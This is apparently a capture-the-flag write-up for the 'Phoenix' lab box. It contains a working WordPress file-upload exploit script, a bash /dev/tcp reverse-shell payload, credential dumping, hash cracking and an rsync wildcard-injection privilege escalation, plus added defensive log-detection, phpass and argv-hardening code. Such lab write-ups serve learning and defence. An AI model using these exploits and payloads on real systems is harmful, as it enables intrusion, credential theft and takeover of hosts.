IP -> 10.10.11.149
We start off with an nmap scan
$ nmap -sCV -v -p- 10.10.11.149
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9d:f3:87:cd:34:75:83:e0:3f:50:d8:39:c6:a5:32:9f (RSA)
| 256 ab:61:ce:eb:ed:e2:86:76:e9:e1:52:fa:a5:c7:7b:20 (ECDSA)
|_ 256 26:2e:38:ca:df:72:d4:54:fc:75:a4:91:65:cc:e8:b0 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to https://phoenix.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
443/tcp open ssl/http Apache httpd
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Apache
| ssl-cert: Subject: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Issuer: commonName=phoenix.htb/organizationName=Phoenix Security Ltd./stateOrProvinceName=Arizona/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T20:08:43
| Not valid after: 2032-02-13T20:08:43
| MD5: 320f c0ee 2f18 bd78 3abc e9d8 66a6 fc26
|_SHA-1: 6879 3f3b c7d3 a517 6785 bcc7 a726 51ce 8827 4a68
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Did not follow redirect to https://phoenix.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Alright! We have port 22 running SSH, port 80 running HTTP, and port 443 running HTTPS.
When we access the website we get redirected to https://phoenix.htb, so let's add it to our /etc/hosts file:
10.10.11.149 phoenix.htb
And let’s refresh the page!
The nmap output already told us this site is running WordPress (robots.txt disallows /wp-admin/), so let's run wpscan!
$ wpscan --url https://phoenix.htb/ -e p --plugins-detection mixed --disable-tls-checks
...
[+] accordion-slider-gallery
| Location: https://phoenix.htb/wp-content/plugins/accordion-slider-gallery/
| Latest Version: 2.2
| Last Updated: 2022-05-07T11:22:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] akismet
| Location: https://phoenix.htb/wp-content/plugins/akismet/
| Latest Version: 4.2.4
| Last Updated: 2022-05-20T09:58:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - https://phoenix.htb/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.
[+] asgaros-forum
| Location: https://phoenix.htb/wp-content/plugins/asgaros-forum/
| Last Updated: 2022-01-30T12:54:00.000Z
| [!] The version is out of date, the latest version is 2.0.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.15.12 (10% confidence)
| Found By: Query Parameter (Passive Detection)
| - https://phoenix.htb/wp-content/plugins/asgaros-forum/skin/widgets.css?ver=1.15.12
[+] photo-gallery-builder
| Location: https://phoenix.htb/wp-content/plugins/photo-gallery-builder/
| Latest Version: 2.3
| Last Updated: 2022-05-07T11:20:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] pie-register
| Location: https://phoenix.htb/wp-content/plugins/pie-register/
| Latest Version: 3.7.5.1
| Last Updated: 2022-06-13T07:37:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
[+] timeline-event-history
| Location: https://phoenix.htb/wp-content/plugins/timeline-event-history/
| Latest Version: 2.2
| Last Updated: 2022-05-07T11:26:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| The version could not be determined.
.....
There aren't any interesting plugins that we can exploit.
After looking around I found a plugin that wasn't showing in our scan: the "Download From Files" plugin, version 1.4.8, which is vulnerable to file upload.
I will be using the following exploit from https://www.exploit-db.com/exploits/50287, modified to accept self-signed HTTPS certificates (verify=False on every request).
from os import path
import sys

import requests


def print_banner():
    print("Download From Files <= 1.48 - Arbitrary File Upload")
    print("Author -> spacehen (www.github.com/spacehen)")


def print_usage():
    print("Usage: python3 exploit.py [target url] [php file]")
    print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")


def vuln_check(uri):
    # The check looks for the string "Sikeres" (Hungarian for "successful") in the
    # response of the plugin's ajax upload handler.
    # verify=False is the modification: phoenix.htb uses a self-signed certificate.
    response = requests.get(uri, verify=False)
    return "Sikeres" in response.text


def main():
    print_banner()
    if len(sys.argv) != 3:
        print_usage()
        sys.exit(1)
    base = sys.argv[1]
    file_path = sys.argv[2]
    ajax_action = 'download_from_files_617_fileupload'
    admin = '/wp-admin/admin-ajax.php'
    uri = base + admin + '?action=' + ajax_action
    if not vuln_check(uri):
        print("(*) Target not vulnerable!")
        sys.exit(1)
    if not path.isfile(file_path):
        print("(*) Invalid file!")
        sys.exit(1)
    # The handler trusts the client-supplied allow-list of extensions and upload directory.
    files = {'files[]': open(file_path, 'rb')}
    data = {
        "allowExt": "php4,phtml",
        "filesName": "files",
        "maxSize": "1000",
        "uploadDir": "."
    }
    print("Uploading Shell...")
    response = requests.post(uri, files=files, data=data, verify=False)
    file_name = path.basename(file_path)
    if "ok" in response.text:
        print("Shell Uploaded!")
        if base[-1] != '/':
            base += '/'
        print(base + "wp-admin/" + file_name)
    else:
        print("Shell Upload Failed")
        sys.exit(1)


main()
Now we need a payload to upload, so I created a file shell.phtml with the following contents:
<?php system("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.53/1234 0>&1'"); ?>
Okay, let's set up our netcat listener and run the script!
python3 50287.py https://phoenix.htb shell.phtml
Download From Files <= 1.48 - Arbitrary File Upload
Author -> spacehen (www.github.com/spacehen)
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1043: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
Uploading Shell...
/usr/lib/python3.10/site-packages/urllib3/connectionpool.py:1043: InsecureRequestWarning: Unverified HTTPS request is being made to host 'phoenix.htb'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
warnings.warn(
Shell Uploaded!
https://phoenix.htb/wp-admin/shell.phtml
And in our netcat session:
$ nc -lvnp 1234
Connection from 10.10.11.149:33478
wp_user@phoenix:~/wordpress/wp-admin$ id
uid=1001(wp_user) gid=1001(wp_user) groups=1001(wp_user)
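From the defender's side, the whole chain above leaves a clear trace in the web server's access log: a POST to admin-ajax.php carrying the plugin's upload action, followed shortly by a request for a freshly dropped .phtml file under /wp-admin/. The script below is an added example and not part of the original writeup. Its log lines are constructed to mirror the exploit run above (the attacker address 10.10.14.53, the ajax action name and the path /wp-admin/shell.phtml come from the page; timestamps, sizes and user agents are made up), and the function names are mine.

```python
import re

# Constructed Apache "combined" log lines modelled on the exploit run in the writeup.
# Only the attacker IP, the ajax action and the shell path are taken from the page.
SAMPLE_LOG = """\
10.10.14.53 - - [18/Jun/2022:14:30:01 +0000] "GET /wp-admin/admin-ajax.php?action=download_from_files_617_fileupload HTTP/1.1" 200 512 "-" "python-requests/2.27.1"
10.10.14.53 - - [18/Jun/2022:14:30:02 +0000] "POST /wp-admin/admin-ajax.php?action=download_from_files_617_fileupload HTTP/1.1" 200 17 "-" "python-requests/2.27.1"
10.10.14.53 - - [18/Jun/2022:14:30:05 +0000] "GET /wp-admin/shell.phtml HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.12 - - [18/Jun/2022:14:31:10 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 88 "https://phoenix.htb/wp-admin/" "Mozilla/5.0"
10.10.14.12 - - [18/Jun/2022:14:31:11 +0000] "GET /wp-admin/admin.php?page=settings HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Enough of the combined format to get client, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

UPLOAD_ACTION = "download_from_files_617_fileupload"   # the plugin's ajax action (from the page)
# Extensions the exploit asks the plugin to allow; WordPress core never serves files with them.
ODD_PHP_EXT = re.compile(r"\.(php[3-7]|phtml|phar)$", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_abuse(log_text):
    """Return alerts for (1) POSTs to the plugin's upload action and (2) requests for
    server-side scripts under /wp-admin/ or /wp-content/uploads/, noting whether the
    same client triggered the upload action earlier in the log."""
    alerts = []
    uploaders = set()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path, query = rec["path"].partition("?")[::2]
        if path.endswith("/wp-admin/admin-ajax.php") and f"action={UPLOAD_ACTION}" in query:
            if rec["method"] == "POST":
                uploaders.add(rec["ip"])
                alerts.append({"ip": rec["ip"], "kind": "upload_action", "path": rec["path"]})
            continue
        suspicious_path = ODD_PHP_EXT.search(path) is not None or (
            path.startswith("/wp-content/uploads/") and path.lower().endswith(".php")
        )
        if suspicious_path:
            alerts.append({"ip": rec["ip"], "kind": "script_exec", "path": path,
                           "after_upload": rec["ip"] in uploaders})
    return alerts


if __name__ == "__main__":
    for alert in find_upload_abuse(SAMPLE_LOG):
        print(alert)
```

The second signal is the stronger one: there is no legitimate reason for a .phtml or .php4 file to be requested under wp-admin/, so it can be alerted on (and blocked at the web server with a FilesMatch deny rule) even without the correlation to the upload action.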
Now let’s run linpeas!
$ bash linpeas.sh
....SNIP..
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.149 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:e888 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:e888 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:e8:88 txqueuelen 1000 (Ethernet)
RX packets 149972 bytes 16300516 (16.3 MB)
RX errors 0 dropped 1041 overruns 0 frame 0
TX packets 120100 bytes 36534553 (36.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=195<UP,BROADCAST,RUNNING,NOARP> mtu 1500
inet 10.11.12.13 netmask 255.255.255.0 broadcast 0.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1976 bytes 204216 (204.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1976 bytes 204216 (204.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions
.........
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', '<++32%himself%FIRM%section%32++>' );
.........
╔══════════╣ Unexpected in root
/backups
.....
So we have two network adapters with different IP addresses, which we will investigate a bit later. We also have credentials for the WordPress database (user "wordpress") and a /backups folder, which we will inspect later.
Let's get the usernames from the MySQL database.
$ mysql -u wordpress -p
password: <++32%himself%FIRM%section%32++>
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2864
Server version: 8.0.28-0ubuntu0.20.04.3 (Ubuntu)
Copyright (c) 2000, 2022, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use wordpress;
mysql> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| Phoenix | $P$BA5zlC0IhOiJKMTK.nWBgUB4Lxh/gc. |
| john | $P$B8eBH6QfVODeb/gYCSJRvm9MyRv7xz. |
| Jsmith | $P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G. |
| Jane | $P$BJCq26vxPmaQtAthFcnyNv1322qxD91 |
| Jack | $P$BzalVhBkVN.6ii8y/nbv3CTLbC0E9e. |
| user1 | $P$BfVdS7OmYoUg3794foF0AH5Lh6Df2v0 |
+------------+------------------------------------+
6 rows in set (0.00 sec)
Inspecting /etc/passwd, we find that there are two users:
phoenix:x:1000:1000:Phoenix:/home/phoenix:/bin/bash
editor:x:1002:1002:John Smith,1,1,1,1:/home/editor:/bin/bash
Okay! So I am guessing that John Smith is Jsmith in wordpress.
Let’s crack the password!
$ john hashes --wordlist=rockyou.txt
Warning: detected hash type "phpass", but the string is also recognized as "PHPass-opencl"
Use the "--format=PHPass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:04:23 12.06% (ETA: 15:16:16) 0g/s 7253p/s 7253c/s 7253C/s cocacola#1..cobalt20
0g 0:00:06:36 18.39% (ETA: 15:15:47) 0g/s 7207p/s 7207c/s 7207C/s vonzti..vontee9
superphoenix (Jsmith)
1g 0:00:08:04 DONE (2022-06-18 14:47) 0.002064g/s 7167p/s 7167c/s 7167C/s superphoenix..superorigina
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
Great! We found credentials for the user editor!
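A quick look at what john was actually working on. WordPress stores these $P$ hashes in the phpass format: the character after $P$ encodes the iteration count as a power of two (B is 2^13 = 8192, the "Cost 1" john reported), the next eight characters are the salt, and the remaining 22 characters are the chained MD5 output in phpass's own base64 alphabet. The script below is an added example, not part of the original writeup: it reimplements the public phpass algorithm in Python so the cost and salt of the hashes above can be read off and a candidate password checked against one of them. The function names are mine; the Jsmith hash and the password come from the page.

```python
import hashlib
import os

# phpass's base64 alphabet (not the RFC 4648 one).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Jsmith's hash exactly as dumped from wp_users above.
JSMITH_HASH = "$P$BV5kUPHrZfVDDWSkvbt/Fw3Oeozb.G."


def _encode64(raw, count):
    """phpass's custom base64: 3 input bytes -> 4 chars, little-endian, no padding."""
    out = []
    i = 0
    while True:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def parse_setting(stored):
    """Split a $P$ hash into (iteration count, salt). The 4th character is log2 of the count."""
    if stored[:3] not in ("$P$", "$H$") or len(stored) < 12:
        raise ValueError("not a phpass hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("iteration count out of range")
    return 1 << count_log2, stored[4:12]


def phpass_hash(password, setting):
    """Hash `password` under a 12-character setting ($P$ + cost char + 8-char salt)."""
    count, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(count):                      # the only slow part: `count` chained MD5s
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def verify(password, stored):
    """Recompute under the stored cost and salt and compare (fine for an offline check)."""
    return phpass_hash(password, stored[:12]) == stored


def make_setting(cost_log2=13, rng=os.urandom):
    """Fresh setting; cost 2^13 = 8192 matches the hashes above, 6 random bytes -> 8 salt chars."""
    return "$P$" + ITOA64[cost_log2] + _encode64(rng(6), 6)


if __name__ == "__main__":
    count, salt = parse_setting(JSMITH_HASH)
    print(f"iterations={count} salt={salt}")
    # Checks the writeup's crack result; prints True if john's answer reproduces.
    print("superphoenix verifies:", verify("superphoenix", JSMITH_HASH))
```

The 8192 rounds are why john only manages about 7000 candidates per second per core above, and also why that is still fast enough: MD5 is cheap and not memory-hard, so a rockyou-sized list finishes in minutes. The mitigation on the application side is a slower, memory-hard password hash (bcrypt or Argon2) rather than a larger phpass cost.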
Let’s try and ssh in:
$ ssh [email protected]
$$$$$$$\ $$\ $$\
$$ __$$\ $$ | \__|
$$ | $$ |$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$\ $$\
$$$$$$$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ |\$$\ $$ |
$$ ____/ $$ | $$ |$$ / $$ |$$$$$$$$ |$$ | $$ |$$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ $$<
$$ | $$ | $$ |\$$$$$$ |\$$$$$$$\ $$ | $$ |$$ |$$ /\$$\
\__| \__| \__| \______/ \_______|\__| \__|\__|\__/ \__|
([email protected]) Password: superphoenix
([email protected]) Verification code:
A verification code? Let's skip that for now and inspect the other network adapter and its open ports.
$ nc 10.11.12.13 22 -v
Connection to 10.11.12.13 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.4
Okay! Let’s try connecting to this IP!
$ ssh [email protected]
$$$$$$$\ $$\ $$\
$$ __$$\ $$ | \__|
$$ | $$ |$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$\ $$\
$$$$$$$ |$$ __$$\ $$ __$$\ $$ __$$\ $$ __$$\ $$ |\$$\ $$ |
$$ ____/ $$ | $$ |$$ / $$ |$$$$$$$$ |$$ | $$ |$$ | \$$$$ /
$$ | $$ | $$ |$$ | $$ |$$ ____|$$ | $$ |$$ | $$ $$<
$$ | $$ | $$ |\$$$$$$ |\$$$$$$$\ $$ | $$ |$$ |$$ /\$$\
\__| \__| \__| \______/ \_______|\__| \__|\__|\__/ \__|
Password: superphoenix
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat 18 Jun 2022 02:48:02 PM UTC
System load: 0.0
Usage of /: 69.7% of 4.36GB
Memory usage: 27%
Swap usage: 0%
Processes: 269
Users logged in: 1
IPv4 address for ens160: 10.10.11.149
IPv6 address for ens160: dead:beef::250:56ff:feb9:e888
IPv4 address for eth0: 10.11.12.13
8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jun 18 14:12:36 2022 from 10.11.12.13
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ cat user.txt
968fa50dbd8b4d....
Great! We logged in: SSH on the second interface did not ask for a verification code.
After a bit of time enumerating I found an odd script in /usr/local/bin named "cron.sh.x".
Running strings didn't get me anywhere, so I got pspy64 running and ran the file.
$ ./pspy64s
...SNIP...
#!/bin/sh
NOW=$(date +"%Y-%m-%d-%H-%M")
FILE="phoenix.htb.$NOW.tar"
cd /backups
mysqldump -u root wordpress > dbbackup.sql
tar -cf $FILE dbbackup.sql && rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* [email protected]:/backups/
...
It directly gave us the contents of the script!
Analysing it, we find that it runs rsync with an unquoted wildcard (*.*) inside /backups, which makes it vulnerable to wildcard injection: any file name in that directory that starts with a dash is expanded by the shell and handed to rsync as an option.
Let's go to /backups and run the following to inject an argument and have the cron job run our own script:
$ cd /backups
$ touch -- "-e sh stuid.sh"
$ echo "chmod +s /bin/bash" > stuid.sh
After waiting a bit we find that the setuid bit is set on /bin/bash!
Let’s run it:
$ /bin/bash -p
bash-5.0# id
uid=1002(editor) gid=1002(editor) euid=0(root) egid=0(root) groups=0(root),1002(editor)
bash-5.0# cat /root/root.txt
c9fb2e679b706ee31....
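Why the touch command above works, and what the backup script should have done instead, is easiest to see by reconstructing the argv that the shell hands to rsync. The script below is an added example and not part of the original writeup: it builds a scratch directory holding a normal backup archive plus the two planted files, expands the cron job's *.* glob the way sh does, and compares the result against a hardened form that ends option parsing with -- and prefixes every name with ./. The file names are made up apart from the two from the page, the destination host is a placeholder, and the function names are mine.

```python
import glob
import os
import shutil
import tempfile

# Fixed part of the cron job's rsync line from the writeup; the destination is a placeholder.
RSYNC_PREFIX = ["rsync", "--ignore-existing", "-t"]
DEST = "backup@BACKUP_HOST:/backups/"   # hypothetical remote, not the page's


def expand_glob(workdir, pattern):
    """Expand `pattern` relative to `workdir` the way sh does for an unquoted glob:
    bare names, dotfiles excluded, sorted."""
    matches = glob.glob(os.path.join(workdir, pattern))
    return sorted(os.path.basename(p) for p in matches)


def build_argv(workdir, pattern="*.*", safe=False):
    """argv rsync receives from `rsync --ignore-existing -t <pattern> DEST` run in `workdir`.

    safe=False mirrors the vulnerable script: expanded names are spliced in verbatim.
    safe=True shows the fix: `--` ends option parsing and `./` pins every name as a path."""
    names = expand_glob(workdir, pattern)
    if safe:
        return RSYNC_PREFIX + ["--"] + ["./" + n for n in names] + [DEST]
    return RSYNC_PREFIX + names + [DEST]


def injected_options(argv):
    """Glob-derived argv words that rsync would parse as options.

    Like most getopt users, rsync treats any dash-prefixed word before `--` as an
    option wherever it appears, so position in the expansion does not matter."""
    found = []
    for word in argv[len(RSYNC_PREFIX):]:
        if word == "--":
            break
        if word.startswith("-"):
            found.append(word)
    return found


def demonstrate():
    """Create a scratch /backups lookalike and return (vulnerable_argv, hardened_argv)."""
    workdir = tempfile.mkdtemp(prefix="backups-demo-")
    try:
        # Constructed contents: one real backup archive plus the two files planted
        # in the writeup ("-e sh stuid.sh" and stuid.sh).
        for name in ("phoenix.htb.2022-06-18-14-40.tar.gz", "-e sh stuid.sh", "stuid.sh"):
            open(os.path.join(workdir, name), "w").close()
        return build_argv(workdir), build_argv(workdir, safe=True)
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    vulnerable, hardened = demonstrate()
    print("vulnerable argv:", vulnerable)
    print("  options smuggled in:", injected_options(vulnerable))
    print("hardened argv:  ", hardened)
    print("  options smuggled in:", injected_options(hardened))
```

The root cause is a root-run job expanding a glob in a directory a low-privilege user can write to, so the argv fix is only half of it: the job should also select its inputs explicitly (for example a find -name '*.tar.gz' -print0 piped to xargs -0, or a fixed file list) and /backups should not be writable by editor.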
I hope you enjoyed the writeup as much as I enjoyed doing this box!